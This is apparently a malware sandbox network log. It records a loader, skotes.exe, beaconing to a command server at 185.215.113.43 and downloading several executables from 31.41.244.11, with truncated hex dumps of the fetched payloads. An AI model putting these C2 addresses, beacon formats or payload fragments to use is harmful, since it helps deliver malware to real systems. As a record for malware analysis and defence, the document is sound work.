Dec 12, 2024 16:48:08.413150072 CET	306	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Dec 12, 2024 16:48:09.786029100 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 35 64 0d 0a 20 3c 63 3e 31 30 31 34 34 33 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 63 32 62 63 30 31 36 31 63 65 65 30 61 62 33 31 62 31 31 30 33 35 31 38 66 65 61 66 36 32 63 62 36 62 34 39 61 35 35 33 36 65 36 23 31 30 31 34 34 33 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 63 32 62 63 30 31 36 31 63 65 65 30 61 62 33 31 62 31 31 30 33 37 34 38 32 65 61 64 36 33 35 65 35 61 65 39 61 35 35 33 36 65 36 23 31 30 31 34 34 33 32 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 63 32 62 63 30 31 36 31 63 65 65 30 61 62 33 31 62 31 31 30 33 34 31 63 64 64 64 65 36 31 30 39 62 62 35 39 61 35 35 33 36 65 36 [TRUNCATED] Data Ascii: 45d <c>1014430001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c2bc0161cee0ab31b1103518feaf62cb6b49a5536e6#1014431001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c2bc0161cee0ab31b11037482ead635e5ae9a5536e6#1014432001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c2bc0161cee0ab31b110341cddde6109bb59a5536e6#1014439001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb932ecb181be703b11d130340c9cbb74885b99a5536e6#1014440001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1014441001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1014442001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1014443001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1014444001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1014445001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbce71914e54a61cf64d4a485a9592e1 [TRUNCATED]
Dec 12, 2024 16:48:09.786041021 CET	72	IN	Data Raw: 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 33 37 61 39 65 34 64 31 35 65 66 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 2384760ac02b4ded8abeee1fbc37a9e4d15ef02ab5e45425197d1aa1daaa8#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49858	31.41.244.11	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:09.910969973 CET	66	OUT	GET /files/7427009775/dwVrTdy.exe HTTP/1.1 Host: 31.41.244.11
Dec 12, 2024 16:48:11.236073017 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:11 GMT Content-Type: application/octet-stream Content-Length: 605696 Last-Modified: Thu, 12 Dec 2024 15:01:11 GMT Connection: keep-alive ETag: "675afab7-93e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MBBvvBvcRBBBwBw+CBwRichPEd11g")l2@``HtLpp(@@.text> `.rdatad@@.data;@.pdatatLN@@.rsrcH`,@@.relocp2@B
Dec 12, 2024 16:48:11.236115932 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 55 48 8d ac 24 50 fe ff ff 48 81 ec b0 02 00 00 0f 57 c0 0f 11 44 24 30 0f 57 Data Ascii: @UH$PHWD$0WfL$@A H)HL$0g4WD$PWfL$`AHHL$P>4WD$pWfMA HHL$p4WEWfMAHH
Dec 12, 2024 16:48:11.236128092 CET	1236	IN	Data Raw: 4d 90 e8 f0 33 02 00 90 0f 57 c0 0f 11 45 b0 0f 57 c9 66 0f 7f 4d c0 41 b8 20 00 00 00 48 8d 15 f3 ab 07 00 48 8d 4d b0 e8 ca 33 02 00 90 0f 57 c0 0f 11 45 d0 0f 57 c9 66 0f 7f 4d e0 41 b8 06 00 00 00 48 8d 15 c1 ab 07 00 48 8d 4d d0 e8 a4 33 02 Data Ascii: M3WEWfMA HHM3WEWfMAHHM3WEWfMA HHM~3WEWfM AHHMX3WE0WfM@A HHM023WEPWfM`AHHMP3WEp
Dec 12, 2024 16:48:11.236258984 CET	1236	IN	Data Raw: 48 8d 15 d4 a7 07 00 48 8d 4d 70 e8 13 2f 02 00 90 0f 57 c0 0f 11 85 90 00 00 00 0f 57 c9 66 0f 7f 8d a0 00 00 00 41 b8 21 00 00 00 48 8d 15 68 a9 07 00 48 8d 8d 90 00 00 00 e8 e4 2e 02 00 90 0f 57 c0 0f 11 85 b0 00 00 00 0f 57 c9 66 0f 7f 8d c0 Data Ascii: HHMp/WWfA!HhH.WWfA HH.WWfA!H2H.WWfA H{HW.WWf A!HH
Dec 12, 2024 16:48:11.236269951 CET	1236	IN	Data Raw: 8d 4c 24 20 e8 46 2a 02 00 90 0f 57 c0 0f 11 44 24 40 0f 57 c9 66 0f 7f 4c 24 50 41 b8 6d 00 00 00 48 8d 15 67 a6 07 00 48 8d 4c 24 40 e8 1d 2a 02 00 90 0f 57 c0 0f 11 44 24 60 0f 57 c9 66 0f 7f 4c 24 70 41 b8 06 00 00 00 48 8d 15 1e a7 07 00 48 Data Ascii: L$ FWD$@WfL$PAmHgHL$@WD$`WfL$pAHHL$`)WEWfMAmHHM)WEWfMAHHM)WEWfMAjHHM)WEWfMAHeHM\)
Dec 12, 2024 16:48:11.236280918 CET	672	IN	Data Raw: 06 00 48 83 c4 28 e9 3c 0e 04 00 48 8d 0d 19 db 06 00 e9 30 0e 04 00 48 8d 0d b1 da 06 00 e9 24 0e 04 00 48 8b 15 71 d6 08 00 4c 8d 05 2a cf 08 00 4c 89 05 6b d6 08 00 48 85 d2 74 13 48 8b 02 48 63 48 04 4c 89 44 11 50 4c 8b 05 53 d6 08 00 48 8b Data Ascii: H(<H0H$HqL*LkHtHHcHLDPLSHTHtHHcHLDPH(HHH(H(AH/E3HxHH(H(xHHHH(_H(A
Dec 12, 2024 16:48:11.236366987 CET	1236	IN	Data Raw: 06 00 e9 a0 0b 04 00 48 83 ec 28 48 8d 0d 69 d5 08 00 e8 6c 01 04 00 48 8d 0d 3d da 06 00 48 83 c4 28 e9 80 0b 04 00 cc cc cc cc 48 8d 0d 39 da 06 00 e9 70 0b 04 00 cc cc cc cc 48 8d 05 81 e8 08 00 c3 cc cc cc cc cc cc cc cc 4c 89 44 24 18 4c 89 Data Ascii: H(HilH=H(H9pHLD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHHHH8_^][@SH HHHWHSHHH$HH [HyH
Dec 12, 2024 16:48:11.236375093 CET	1236	IN	Data Raw: cf e8 91 fd ff ff 48 8b 54 24 60 48 83 fa 0f 76 2e 48 ff c2 48 8b 4c 24 48 48 8b c1 48 81 fa 00 10 00 00 72 15 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 77 29 e8 b8 00 04 00 48 8d 05 b1 e2 06 00 48 89 07 0f 11 77 18 48 8b c7 0f 28 Data Ascii: HT$`Hv.HHL$HHHrH'HIH+HHw)HHwH($H_^[/)H\$WH HHHH t(HLH\$0HH _H\$WHPDHHL$ HHJHT$(HPHT$(
Dec 12, 2024 16:48:11.236381054 CET	1236	IN	Data Raw: 48 8b c1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 78 8b d1 48 8d 4c 24 30 e8 d0 ff ff ff 48 8d 54 24 20 48 8d 4c 24 40 0f 10 00 0f 29 44 24 20 e8 b9 fb ff ff 48 8d 15 2a 8f 08 00 48 8d 4c 24 40 e8 08 1e 04 00 cc cc cc cc cc cc cc Data Ascii: HHxHL$0HT$ HL$@)D$ H*HL$@HHAHAHHHHHHL$ HHL$ @SH HHHWHSHHHCHHHHH [3
Dec 12, 2024 16:48:11.236448050 CET	1236	IN	Data Raw: b6 0b 48 8b d7 e8 45 e5 03 00 88 03 48 ff c3 48 3b de 75 eb 48 8b 7c 24 40 48 8b c3 48 8b 5c 24 48 48 83 c4 20 5e c3 cc cc cc cc cc cc cc cc 0f b6 c2 c3 cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 49 8b d8 49 8b c9 4c 2b c2 e8 1c 62 06 Data Ascii: HEHH;uH\|$@HH\$HH ^@SH IIL+bHH [@SH HL$PIL+aHH [H\$WH HHHA ~HIyHIHK(HH@t0HtHH\$0H _H\$
Dec 12, 2024 16:48:11.356235981 CET	1236	IN	Data Raw: 83 ec 60 48 8b 05 21 9c 08 00 48 33 c4 48 89 44 24 48 49 8b f9 49 8b f0 48 8b da 49 3b d0 0f 84 80 00 00 00 48 89 ac 24 90 00 00 00 48 8d 69 30 4c 89 74 24 58 45 33 f6 4c 89 7c 24 50 41 bf ff ff 00 00 0f 1f 84 00 00 00 00 00 0f b6 03 4c 8d 4c 24 Data Ascii: `H!H3HD$HIIHI;H$Hi0Lt$XE3L\|$PALL$@AD$0HT$0Lt$@HL$8Hl$ uL$8HfAHHfOH;uL\|$PLt$XH$HHL$HH3H`_^[@SH@HSH3HD$0ALI0LD$ HD$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49868	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:14.896534920 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 34 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014430001&unit=246122658369
Dec 12, 2024 16:48:16.236272097 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49872	31.41.244.11	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:16.415262938 CET	66	OUT	GET /files/7427009775/AzVRM7c.exe HTTP/1.1 Host: 31.41.244.11
Dec 12, 2024 16:48:17.714489937 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:17 GMT Content-Type: application/octet-stream Content-Length: 605696 Last-Modified: Thu, 12 Dec 2024 15:01:25 GMT Connection: keep-alive ETag: "675afac5-93e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MBBvvBvcRBBBwBw+CBwRichPEd11g")l2@``HtLpp(@@.text> `.rdatad@@.data;@.pdatatLN@@.rsrcH`,@@.relocp2@B
Dec 12, 2024 16:48:17.714499950 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 55 48 8d ac 24 50 fe ff ff 48 81 ec b0 02 00 00 0f 57 c0 0f 11 44 24 30 0f 57 Data Ascii: @UH$PHWD$0WfL$@A H)HL$0g4WD$PWfL$`AHHL$P>4WD$pWfMA HHL$p4WEWfMAHHM3WEWf
Dec 12, 2024 16:48:17.714508057 CET	448	IN	Data Raw: 48 8d 4d b0 e8 fa 2f 02 00 90 0f 57 c0 0f 11 45 d0 0f 57 c9 66 0f 7f 4d e0 41 b8 21 00 00 00 48 8d 15 dd a9 07 00 48 8d 4d d0 e8 d4 2f 02 00 90 0f 57 c0 0f 11 45 f0 0f 57 c9 66 0f 7f 4d 00 41 b8 20 00 00 00 48 8d 15 07 a8 07 00 48 8d 4d f0 e8 ae Data Ascii: HM/WEWfMA!HHM/WEWfMA HHM/WEWfM A!HHM/WE0WfM@A HHM0b/WEPWfM`A!HHMP</WEpWfA HHMp/W
Dec 12, 2024 16:48:17.714623928 CET	1236	IN	Data Raw: 00 00 41 b8 21 00 00 00 48 8d 15 fc a8 07 00 48 8d 8d 10 01 00 00 e8 28 2e 02 00 90 0f 57 c0 0f 11 85 30 01 00 00 0f 57 c9 66 0f 7f 8d 40 01 00 00 41 b8 20 00 00 00 48 8d 15 55 a7 07 00 48 8d 8d 30 01 00 00 e8 f9 2d 02 00 90 0f 57 c0 0f 11 85 50 Data Ascii: A!HH(.W0Wf@A HUH0-WPWf`A!HHP-WpWfA H/Hp-WWfA!HHl-HD$0HD$ HHD$((D$
Dec 12, 2024 16:48:17.714706898 CET	1236	IN	Data Raw: 00 00 00 48 8d 15 65 a5 07 00 48 8d 4d e0 e8 5c 29 02 00 90 0f 57 c0 0f 11 45 00 0f 57 c9 66 0f 7f 4d 10 41 b8 6a 00 00 00 48 8d 15 df a6 07 00 48 8d 4d 00 e8 36 29 02 00 90 0f 57 c0 0f 11 45 20 0f 57 c9 66 0f 7f 4d 30 41 b8 08 00 00 00 48 8d 15 Data Ascii: HeHM\)WEWfMAjHHM6)WE WfM0AHIHM )WE@WfMPAoHHM@(3HHP]HH@HHWfHH?LH
Dec 12, 2024 16:48:17.714719057 CET	1236	IN	Data Raw: 83 c4 28 e9 5f 0d 04 00 cc cc cc 48 83 ec 28 41 b9 01 00 00 00 48 8d 15 ff cf 08 00 45 33 c0 48 8d 0d 85 cf 08 00 e8 a0 e2 01 00 48 8d 0d c5 da 06 00 48 83 c4 28 e9 2c 0d 04 00 40 53 48 83 ec 20 b9 02 00 00 00 e8 b8 77 04 00 48 8d 0d c9 cf 08 00 Data Ascii: (_H(AHE3HHH(,@SH wHH!HE3HHHAHH [HHHHcHHHDPHHcHLH(HH}H(HQHJH
Dec 12, 2024 16:48:17.714731932 CET	1236	IN	Data Raw: 20 5b c3 cc cc cc cc 44 89 02 48 8b c2 48 89 4a 08 c3 cc cc cc cc cc 40 53 48 83 ec 30 48 8b 01 49 8b d8 44 8b c2 48 8d 54 24 20 ff 50 18 48 8b 4b 08 4c 8b 48 08 48 8b 51 08 49 39 51 08 75 0e 8b 0b 39 08 75 08 b0 01 48 83 c4 30 5b c3 32 c0 48 83 Data Ascii: [DHHJ@SH0HIDHT$ PHKLHHQI9Qu9uH0[2H0[HBLHL9IuD9u2HyHAHH9HAH@SVWH)$HHHL$ IHL$h%HHD$ 6Hxt
Dec 12, 2024 16:48:17.714812994 CET	1236	IN	Data Raw: 8b da 41 83 f8 01 75 1d 0f 57 c0 41 b8 15 00 00 00 0f 11 02 48 89 7a 10 48 89 7a 18 48 8d 15 b8 bb 07 00 eb 2a 41 8b c8 e8 f6 e1 03 00 0f 57 c0 49 c7 c0 ff ff ff ff 0f 11 03 48 89 7b 10 48 89 7b 18 90 49 ff c0 42 38 3c 00 75 f7 48 8b d0 48 8b cb Data Ascii: AuWAHzHzH*AWIH{H{IB8<uHHHH\$@H0_HH\$WH@HH3HD$8HHT$(3H\|$(HT$(A7HD$0WHH{H{HuAH3LHT$(HL
Dec 12, 2024 16:48:17.714824915 CET	1236	IN	Data Raw: 7b 8c 07 00 33 d2 48 8d 4d b7 e8 54 bc 03 00 90 4c 89 75 bf c6 45 c7 00 4c 89 75 cf c6 45 d7 00 4c 89 75 df 66 44 89 75 e7 4c 89 75 ef 66 44 89 75 f7 4c 89 75 ff c6 45 07 00 4c 89 75 0f c6 45 17 00 48 85 db 0f 84 d2 00 00 00 48 8b d3 48 8d 4d b7 Data Ascii: {3HMTLuELuELufDuLufDuLuELuEHHHMdDvHHHMlHFN H7HMHMHtLuHMHtLuHMHtLuHMHtLuHMHtLuHMHtL
Dec 12, 2024 16:48:17.714835882 CET	1236	IN	Data Raw: 48 8b f1 4d 3b c1 74 20 0f 1f 00 48 8b 06 0f b7 d5 44 0f b7 03 48 8b ce ff 50 20 84 c0 75 09 48 83 c3 02 48 3b df 75 e3 48 8b c3 48 8b 5c 24 58 48 83 c4 20 5f 5e 5d c3 cc cc cc 48 89 5c 24 20 55 56 57 48 83 ec 20 49 8b f9 49 8b d8 0f b7 ea 48 8b Data Ascii: HM;t HDHP uHH;uHH\$XH _^]H\$ UVWH IIHM;t HDHP tHH;uHH\$XH _^]HQH\$ VH IHI;t'H\|$@HyfHfHH;uH\|$@HH\$HH ^HQ
Dec 12, 2024 16:48:17.834417105 CET	1236	IN	Data Raw: 68 c3 33 d2 33 c9 e8 8c 11 04 00 cc 48 89 5c 24 60 f6 c2 04 74 09 48 8d 1d c2 82 07 00 eb 15 f6 c2 02 48 8d 1d ce 82 07 00 48 8d 05 df 82 07 00 48 0f 44 d8 ba 01 00 00 00 48 8d 4c 24 20 e8 04 ed ff ff 4c 8b c0 48 8d 4c 24 30 48 8b d3 e8 d4 fe ff Data Ascii: h33H\$`tHHHHDHL$ LHL$0HHeHL$03H\$`H\$WH H3HA@HAAAHA HA(HA0HA8AVHWHCH_@H\$0H _H\$WH H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49884	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:21.459445953 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 34 33 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014431001&unit=246122658369
Dec 12, 2024 16:48:22.811506987 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49890	31.41.244.11	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:22.948869944 CET	66	OUT	GET /files/7427009775/t5abhIx.exe HTTP/1.1 Host: 31.41.244.11
Dec 12, 2024 16:48:24.265642881 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:24 GMT Content-Type: application/octet-stream Content-Length: 605696 Last-Modified: Thu, 12 Dec 2024 15:01:40 GMT Connection: keep-alive ETag: "675afad4-93e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MBBvvBvcRBBBwBw+CBwRichPEd11g")l2@``HtLpp(@@.text> `.rdatad@@.data;@.pdatatLN@@.rsrcH`,@@.relocp2@B
Dec 12, 2024 16:48:24.265769958 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 55 48 8d ac 24 50 fe ff ff 48 81 ec b0 02 00 00 0f 57 c0 0f 11 44 24 30 0f 57 Data Ascii: @UH$PHWD$0WfL$@A H)HL$0g4WD$PWfL$`AHHL$P>4WD$pWfMA HHL$p4WEWfMAHHM3WEWf
Dec 12, 2024 16:48:24.265783072 CET	1236	IN	Data Raw: 48 8d 4d b0 e8 fa 2f 02 00 90 0f 57 c0 0f 11 45 d0 0f 57 c9 66 0f 7f 4d e0 41 b8 21 00 00 00 48 8d 15 dd a9 07 00 48 8d 4d d0 e8 d4 2f 02 00 90 0f 57 c0 0f 11 45 f0 0f 57 c9 66 0f 7f 4d 00 41 b8 20 00 00 00 48 8d 15 07 a8 07 00 48 8d 4d f0 e8 ae Data Ascii: HM/WEWfMA!HHM/WEWfMA HHM/WEWfM A!HHM/WE0WfM@A HHM0b/WEPWfM`A!HHMP</WEpWfA HHMp/W
Dec 12, 2024 16:48:24.265795946 CET	1236	IN	Data Raw: 57 c0 66 0f 7f 05 c5 f1 08 00 48 c7 05 ca f1 08 00 07 00 00 00 48 c7 05 c7 f1 08 00 08 00 00 00 c7 05 85 f1 08 00 00 00 80 3f 4c 8b c0 ba 10 00 00 00 48 8d 0d 8e f1 08 00 e8 81 f4 01 00 90 48 8d 5c 24 20 66 66 66 0f 1f 84 00 00 00 00 00 4c 8b c3 Data Ascii: WfHH?LHH\$ fffLHU`HRiH@HE`H;uLA@AHL$ xH]H$Hp]TH\$UHl$HpWD$ WfL$0AHHL$ F*WD$@
Dec 12, 2024 16:48:24.265870094 CET	896	IN	Data Raw: 0f 04 00 48 83 ec 28 41 b9 01 00 00 00 48 8d 15 17 cf 08 00 45 33 c0 48 8d 0d 9d ce 08 00 e8 68 e4 01 00 48 8d 0d 19 db 06 00 48 83 c4 28 e9 f4 0e 04 00 40 53 48 83 ec 20 b9 01 00 00 00 e8 80 79 04 00 48 8d 0d e1 ce 08 00 48 8b d8 e8 e9 f1 01 00 Data Ascii: H(AHE3HhHH(@SH yHHHJE3HHHHH [HL*LHtHHcHLDPLHHtHHcHLDPH(HHH(<H
Dec 12, 2024 16:48:24.265882969 CET	1236	IN	Data Raw: 06 00 e9 a0 0b 04 00 48 83 ec 28 48 8d 0d 69 d5 08 00 e8 6c 01 04 00 48 8d 0d 3d da 06 00 48 83 c4 28 e9 80 0b 04 00 cc cc cc cc 48 8d 0d 39 da 06 00 e9 70 0b 04 00 cc cc cc cc 48 8d 05 81 e8 08 00 c3 cc cc cc cc cc cc cc cc 4c 89 44 24 18 4c 89 Data Ascii: H(HilH=H(H9pHLD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHHHH8_^][@SH HHHWHSHHH$HH [HyH
